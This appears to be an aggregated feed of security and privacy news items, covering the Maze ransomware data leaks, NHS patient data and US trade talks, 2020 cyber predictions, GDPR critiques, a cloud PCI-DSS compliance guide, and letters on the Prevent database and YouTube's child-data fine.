“The use of targeted ransomware attacks isn’t new and, unfortunately, it’s not going anywhere anytime soon. This is an extremely lucrative attack avenue for adversaries and as such, its popularity is likely only going to increase. What makes these particular attacks interesting is the additional monetization avenue of exfiltrating data in the process,” Talos points out.

The threat agent could demand more money from the victim with this data in hand, or could monetize it by selling it to other cyber criminals on dark web platforms. Not to mention that entities will pay for the damage incurred by their data being published.

“This trend of achieving maximum monetary gain for their nefarious activities is increasingly common in the crimeware space […]. Expect adversaries to be increasingly aware of the systems and networks they are compromising as all systems and networks are not created equally and some have much higher profit margins, when compromised,” Talos concludes.

The post Maze Ransomware Operators Publish User Information appeared first on .

The Guardian view on Boris Johnson’s NHS plan: trading patient data | Editorial

Donald Trump has made clear he wants a post-Brexit Britain to let US tech companies and big pharma access medical records

The NHS is a goldmine of patient data which the United States wants to be quarried by some of its biggest companies. Britain’s health service is home to a unique medical dataset that covers the entire population from birth to death. Jeremy Corbyn’s NHS press conference revealed that the US wanted its companies to get unrestricted access to the UK’s medical records, thought to be worth £10bn a year. A number of tech companies – including Google – already mine small parts of the NHS store. Ministers have been treading carefully after an attempt to create a single patient database for commercial exploitation was scrapped in 2016 when it emerged there was no way for the public to work out who would have access to their medical records or how they were using them.

However, such caution might be thrown to the wind if Boris Johnson gets his way over Brexit – and patients’ privacy rights are traded away for US market access. This would be a damaging step, allowing US big tech and big pharma to collect sensitive, personal data on an unprecedented scale. Donald Trump’s officials have already made clear that this is what they are aiming for. In the leaked government records of talks between US and UK trade representatives White House officials state that “the free flow of data is a top priority” in a post-Brexit world. Trump’s team see Brexit as an opportunity “to avoid forcing companies to disclose algorithms”. The US wants the UK to drop the EU’s 2018 data law, in which individuals must be told what is happening with their medical data, even if scrubbed of personal identifiers.

Continue reading...

Accelerated Digital Innovation to impact the Cybersecurity Threat Landscape in 2020

Its December and the Christmas lights are going up, so it can't be too early for cyber predictions for 2020.   With this in mind, Richard Starnes, Chief Security Strategist at Capgemini, sets out what the priorities will be for businesses in 2020 and beyond.


Accelerated digital innovation is a double-edged sword that will continue to hang over the cybersecurity threat landscape in 2020.  As businesses rapidly chase digital transformation and pursue the latest advancements in 5G, cloud and IoT, they do so at the risk of exposing more of their operations to cyber-attacks. These technologies have caused an explosion in the number of end-user devices, user interfaces, networks and data; the sheer scale of which is a headache for any cybersecurity professional. 

In order to aggressively turn the tide next year, cyber analysts can no longer avoid AI adoption or ignore the impact of 5G. 

AI Adoption
Hackers are already using AI to launch sophisticated attacks – for example AI algorithms can send ‘spear phishing’ tweets six times faster than a human and with twice the success. In 2020, by deploying intelligent, predictive systems, cyber analysts will be better positioned to anticipate the exponentially growing number of threats.

The Convergence of IT and OT
At the core of the Industry 4.0 trend is the convergence of operations technology (OT) and information technology (IT) networks, i.e. the convergence of industrial and traditional corporate IT systems. While this union of these formerly disparate networks certainly facilitates data exchange and enables organisations to improve business efficiency, it also comes with a host of new security concerns.

5G and IoT
While 5G promises faster speed and bandwidth for connections, it also comes with a new generation of security threats. 5G is expected to make more IoT services possible and the framework will no longer neatly fit into the traditional security models optimised for 4G. Security experts warn of threats related to the 5G-led IoT growth anticipated in 2020, such as a heightened risk of Distributed Denial-of-Service (DDoS) attacks.

Death of the Password
2020 could see organisations adopt new and sophisticated technologies to combat risks associated with weak passwords.

More Power to Data Protection Regulations
In 2020, regulations like GDPR, The California Consumer Privacy Act and PSD2 are expected to get harsher. We might also see announcements of codes of conduct specific to different business sectors like hospitality, aviation etc. All this will put pressure on businesses to make data security a top consideration at the board level.

Has WhatsApp become a potential career assassin? | Afua Hirsch

The app helped connect me to an inspiring sisterhood. But the case of police officer Robyn Williams shows unopened messages can be a legal minefield

We need to talk about WhatsApp. When the little green speech bubble first showed up in my life, I greeted it with awe and wonder. I even wrote a little love letter to its ability to connect with a virtual black sisterhood – the kind that rarely exists in our too-undiverse workplaces in real life – in my first book. It became the perfect platform to share experiences, frustrations, strategies and ideas.

WhatsApp group communities proliferated on my phone – they were education, community and activism all in one place. It was great.

Continue reading...

These new rules were meant to protect our privacy. They don’t work | Stephanie Hare

The data protection laws introduced last year are failing us – and our children

Who owns your data? This is one of the toughest questions facing governments, companies and regulators today and no one has answered it to anyone’s satisfaction. Not what we were promised last year, when the European Union’s General Data Protection Regulation, commonly known as the GDPR, came into effect.

The GDPR was billed as the gold standard of data protection, offering the strongest data rights in the world. It has forced companies everywhere to modify their operating models, often at great cost. It inspired the state of California to pass a similar law and where California leads, the rest of the US often follows; there have been calls for a federal version of the GDPR.

Most websites nudge us into clicking 'I consent' by making it harder for us not to

Advances in computing processing power and AI will allow those who have our data to do much more with it, and so with us

Continue reading...

A Guide to PCI Compliance in the Cloud

In an age where hosting infrastructure in a cloud environment becomes more and more attractive – whether for maintenance, price, availability, or scalability – several service providers offer different PCI-DSS (Payment Card Industry – Data Security Standard) compliant solutions for their customers’ need to deal with payment cards.

Many companies believe that when choosing a business partner already certified in PCI-DSS, no further action is required since this environment has already been evaluated. However, while a PCI-DSS compliant provider brings more security and reliability, only its certification is not enough for the contractor’s environment to be certified as well.

All certified service providers must offer their customers an array of services and responsibilities, where they clearly define what each party needs to do to achieve PCI compliance in the environment. 

With this in mind, there are some important tips to take into account, mainly focusing on the first six PCI-DSS requirements, and also some important information for cloud service providers to take into account.

Requirement 1: Install and maintain a firewall configuration to protect the cardholder data

To protect cardholder data, you must implement and configure environmental targeting in accordance with PCI network requirements. It should be analyzed with tools the service provider offers to enable the contractor to achieve compliance. Some important services to consider:

  • Network Groups: A tool that will be used to perform the logical segmentation of the cloud-hosted environment. Traditionally, communications are blocked, and rules must be created to release access between instances.
  • Private Cloud: Should be used to isolate the provider’s networks in private networks, preventing the connection and access of other networks except those duly authorized by the targeting tool created in the same private cloud. This configuration facilitates the segmentation and logical management of accesses, reducing the exposure of the environment and card data.
  • Elastic Computing: It allows the creation of an instance that is scalable, that is, after it is identified that the processing reaches a parameter pre-defined by the user, creates another instance identical to the first. This process repeats itself as there is a need for more processing power. With the reduction of processing, the instances are then deactivated.

Requirement 2: Do not use vendor-supplied defaults for system passwords and other security parameters

In the case of SaaS (Software as a Service) cloud services, the need to apply secure configuration controls rests with the provider, assuming that the service provider identifies the service as part of its environment accordingly.

Using PaaS (Platform as a Service) or IaaS (Infrastructure as a Service), when the configuration of the instance is made by the contracted company, it is very important to create the procedure of hardening to be used and to ensure that it is properly applied in the instance before creating the rules that grant access to the other environments.

Requirement 3: Protect stored data from cardholder

Secure storage of card data is one of the priorities of the standard. Natively, cloud environments do not protect data, so the company acquiring the service must identify how it can make the data secure during the process, as well as assess whether the provider provides the necessary tools.

For card data encryption, key management is another crucial point, as important encryption of the data itself. The documentation and secure management of the data encryption keys (DEK) and key-encryption key (KEK) must be done by the contractor and can use the resources offered by the providers.

Requirement 4: Encrypt the cardholder data transmission on open public networks

The implementation of secure communication channels must be planned by the contractor, either through the acquisition of a secure communication service or even through the implementation of communication certificates. Always use robust PCI-DSS-based encryption protocols, such as TLS 1.2, IPSec, SFTP, etc.

Requirement 5: Use and regularly update anti-virus software or programs

Another common mistake is to consider that the implementation of antivirus is the responsibility of the service provider, or even believe that their systems are not susceptible to malicious software.

Cloud services do not include the provision of this type of software by default in all scenarios. This means that those seeking PCI-DSS certification need to identify how to implement and define the use of an antivirus solution, ensuring its installation, management, logging, and monitoring.

Requirement 6: Develop and maintain secure systems and applications

By confirming the certified service offered by the cloud provider (Saas) in the responsibility matrix, the contracting company does not need to take any additional actions related to the management of the structure that maintains that environment.

In the case of a certified service offered by the cloud provider, the contracting company confirming this in the contractor’s responsibilities matrix does not need to take any additional actions related to the management of the structure that maintains that environment.

However, when acquiring IaaS or PaaS services, it is important to enable vulnerability identification procedures, security updates, change management, and secure development.

Speaking specifically of public-facing web applications, PCI-DSS requires the manual or automated validation of all code developed for the application. A recommended alternative is the implementation of a Web Application Firewall, which can also be used as a service acquired from the marketplace of these companies or as an application to be contracted (e.g. AWS WAF, Azure WAF, Google Virtual Web Application Firewall).


Marty Puranik co-founded Atlantic.Net from his dorm room at the University of Florida in 1994. As CEO and President of Atlantic.Net, one of the first Internet Service Providers in America, Marty grew the company from a small ISP to a large regional player in the region, while observing America’s regulatory environment limit competition and increase prices on consumers. To keep pace with a changing industry, over the years he has led Atlantic.Net through the acquisition of 16 Internet companies, tripling the company’s revenues and establishing customer relationships in more than 100 countries. Providing cutting-edge cloud hosting before the mainstream did, Atlantic.Net has expanded to seven data centers in three countries, with a fourth pending.

The post A Guide to PCI Compliance in the Cloud appeared first on Cloudbric.

Prevent database is secure but not secret | Letter

Describing a documented database as ‘secret’ risks causing unjustified distrust in a multi-agency programme that seeks to protect those vulnerable to all forms of radicalisation and keep our communities safe, writes Chief Constable Simon Cole

Your front-page lead (7 October) talks of a “secret” police Prevent database. It is not a very well kept “secret”; a quick online search brings up numerous references to its existence in public documents – and it is where the published annual referral statistics are sourced from. The Prevent pages on the National Police Chiefs’ Council website also refer to the fact Prevent officers keep records.

We do this for exactly the same purpose we document other forms of supportive safeguarding activity such as for child sexual exploitation, domestic abuse or human trafficking. It means we can be – and are – subject to oversight and accountability.

Continue reading...

YouTube’s fine and child safety online | Letters

Fining YouTube for targeting adverts at children as if they were adults shows progress is being made on both sides of the Atlantic, writes Steve Wood of the Information Commissioner’s Office

The conclusion of the Federal Trade Commission investigation into YouTube’s gathering of young people’s personal information (‘Woeful’ YouTube fine for child data breach, 5 September) shows progress is being made on both sides of the Atlantic towards a more children-friendly internet. The company was accused of treating younger users’ data in the same way it treats adult users’ data.

YouTube’s journey sounds similar to many other online services: it began targeting adults, found more and more children were using its service, and so continued to take commercial advantage of that. But the allegation is it didn’t treat those young people differently, gathering their data and using it to target content and adverts at them as though they were adult users.

Continue reading...